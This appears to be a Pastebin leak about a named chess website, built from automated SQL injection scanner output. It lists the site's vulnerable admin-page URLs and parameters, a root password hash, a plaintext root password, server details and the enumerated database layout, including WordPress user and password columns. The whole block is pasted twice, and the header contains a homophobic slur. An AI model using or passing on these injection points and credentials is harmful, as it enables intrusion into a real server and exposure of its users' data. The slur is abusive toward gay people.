Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://xqfan.com/ AKA retarded chess games leaked for no reason , enjoy faggots
- Version 5.5.38-0ubuntu0.12.04.1
- Server Apache/2.2.22 (Ubuntu)
- OS debian-linux-gnu
- user root@localhost
- Database xqfan
- root_PasswordHash 317E9221C707F3F74E0B9CAA6AEB40AA63521E48
- root password minh08
- http://xqfan.com/ AKA retarded chess games leaked for no reason , enjoy faggots
- Version 5.5.38-0ubuntu0.12.04.1
- Server Apache/2.2.22 (Ubuntu)
- OS debian-linux-gnu
- user root@localhost
- Database xqfan
- half of* root_PasswordHash *317E9221C707F3F74E0B9CAA6AEB40AA63521E48
- ----------------------------------------------------------------------------------
- Vulnerability Result
- No. 1
- ReferURL http://xqfan.com/vn/admin1.php?id=622
- Parameter id=622
- Type Integer
- KWordActionURL Hướng
- Vulnerability URL SQL INJECTION
- ----------------------------------------------------------------------------------
- No. 2
- ReferURL http://xqfan.com/vn/admin1.php?id=99999999
- Parameter id=99999999
- Type Integer
- KWordActionURL thuật
- Vulnerability URL SQL INJECTION
- ----------------------------------------------------------------------------------
- No. 3
- ReferURL http://xqfan.com/vn/admin1.php?id=
- Parameter id=
- Type Search
- KWordActionURL ChessFriends
- Vulnerability URL SQL INJECTION
- ----------------------------------------------------------------------------------
- Proof Of Concept - SQL INJECTION
- Parameter Value
- URL http://xqfan.com/vn/admin1.php?id=622
- RequestType GET
- DatabaseType MySQL
- InjectionType Integer
- GettingDataBy FieldEcho
- ----------------------------------------------------------------------------------
- Proof Of Concept - Getting Database Structure
- DB-----Table---Column
- mysql
- db
- Db
- Host
- Insert_priv
- Update_priv
- User
- Grant_priv
- Index_priv
- Drop_priv
- Event_priv
- Create_priv
- Delete_priv
- Create_tmp_table_priv
- Alter_priv
- Create_view_priv
- Show_view_priv
- Select_priv
- Execute_priv
- Alter_routine_priv
- Create_routine_priv
- Trigger_priv
- Lock_tables_priv
- References_priv
- help_category
- help_keyword
- proc
- servers
- event
- proxies_priv
- slow_log
- plugin
- columns_priv
- procs_priv
- general_log
- ndb_binlog_index
- func
- time_zone
- help_topic
- time_zone_transition
- host
- user
- time_zone_leap_second
- tables_priv
- Db
- Grantor
- Table_name
- Column_priv
- Host
- Table_priv
- User
- Timestamp
- help_relation
- time_zone_name
- time_zone_transition_type
- db
- func
- event
- help_topic
- proc
- servers
- procs_priv
- host
- ndb_binlog_index
- help_keyword
- slow_log
- user
- help_category
- general_log
- columns_priv
- help_relation
- tables_priv
- plugin
- proxies_priv
- time_zone_name
- time_zone
- time_zone_leap_second
- time_zone_transition
- time_zone_transition_type
- nctg
- xqfan
- phpmyadmin
- pma_relation
- pma_history
- pma_pdf_pages
- pma_bookmark
- pma_table_coords
- pma_column_info
- pma_tracking
- pma_designer_coords
- pma_table_info
- pma_userconfig
- pma_tracking
- pma_designer_coords
- pma_pdf_pages
- pma_column_info
- pma_userconfig
- pma_relation
- pma_bookmark
- pma_table_coords
- pma_history
- pma_table_info
- wordpress
- nctgforums
- softgaroo
- xqsun
- wp_comments
- wp_terms
- wp_links
- wp_posts
- wp_users
- ID
- user_login
- user_url
- user_activation_key
- user_status
- user_nicename
- user_email
- display_name
- user_pass
- user_registered
- wp_commentmeta
- wp_options
- wp_postmeta
- wp_usermeta
- wp_term_taxonomy
- wp_term_relationships
- information_schema
- performance_schema
- ----------------------------------------------------------------------------------
- Vulnerability Result
- No. 1
- ReferURL http://xqfan.com/vn/admin1.php?id=622
- Parameter id=622
- Type Integer
- KWordActionURL Hướng
- Vulnerability URL SQL INJECTION
- ----------------------------------------------------------------------------------
- No. 2
- ReferURL http://xqfan.com/vn/admin1.php?id=99999999
- Parameter id=99999999
- Type Integer
- KWordActionURL thuật
- Vulnerability URL SQL INJECTION
- ----------------------------------------------------------------------------------
- No. 3
- ReferURL http://xqfan.com/vn/admin1.php?id=
- Parameter id=
- Type Search
- KWordActionURL ChessFriends
- Vulnerability URL SQL INJECTION
- ----------------------------------------------------------------------------------
- Proof Of Concept - SQL INJECTION
- Parameter Value
- URL http://xqfan.com/vn/admin1.php?id=622
- RequestType GET
- DatabaseType MySQL
- InjectionType Integer
- GettingDataBy FieldEcho
- ----------------------------------------------------------------------------------
- Proof Of Concept - Getting Database Structure
- DB-----Table---Column
- mysql
- db
- Db
- Host
- Insert_priv
- Update_priv
- User
- Grant_priv
- Index_priv
- Drop_priv
- Event_priv
- Create_priv
- Delete_priv
- Create_tmp_table_priv
- Alter_priv
- Create_view_priv
- Show_view_priv
- Select_priv
- Execute_priv
- Alter_routine_priv
- Create_routine_priv
- Trigger_priv
- Lock_tables_priv
- References_priv
- help_category
- help_keyword
- proc
- servers
- event
- proxies_priv
- slow_log
- plugin
- columns_priv
- procs_priv
- general_log
- ndb_binlog_index
- func
- time_zone
- help_topic
- time_zone_transition
- host
- user
- time_zone_leap_second
- tables_priv
- Db
- Grantor
- Table_name
- Column_priv
- Host
- Table_priv
- User
- Timestamp
- help_relation
- time_zone_name
- time_zone_transition_type
- db
- func
- event
- help_topic
- proc
- servers
- procs_priv
- host
- ndb_binlog_index
- help_keyword
- slow_log
- user
- help_category
- general_log
- columns_priv
- help_relation
- tables_priv
- plugin
- proxies_priv
- time_zone_name
- time_zone
- time_zone_leap_second
- time_zone_transition
- time_zone_transition_type
- nctg
- xqfan
- phpmyadmin
- pma_relation
- pma_history
- pma_pdf_pages
- pma_bookmark
- pma_table_coords
- pma_column_info
- pma_tracking
- pma_designer_coords
- pma_table_info
- pma_userconfig
- pma_tracking
- pma_designer_coords
- pma_pdf_pages
- pma_column_info
- pma_userconfig
- pma_relation
- pma_bookmark
- pma_table_coords
- pma_history
- pma_table_info
- wordpress
- nctgforums
- softgaroo
- xqsun
- wp_comments
- wp_terms
- wp_links
- wp_posts
- wp_users
- ID
- user_login
- user_url
- user_activation_key
- user_status
- user_nicename
- user_email
- display_name
- user_pass
- user_registered
- wp_commentmeta
- wp_options
- wp_postmeta
- wp_usermeta
- wp_term_taxonomy
- wp_term_relationships
- information_schema
- performance_schema
Add Comment
Please, Sign In to add comment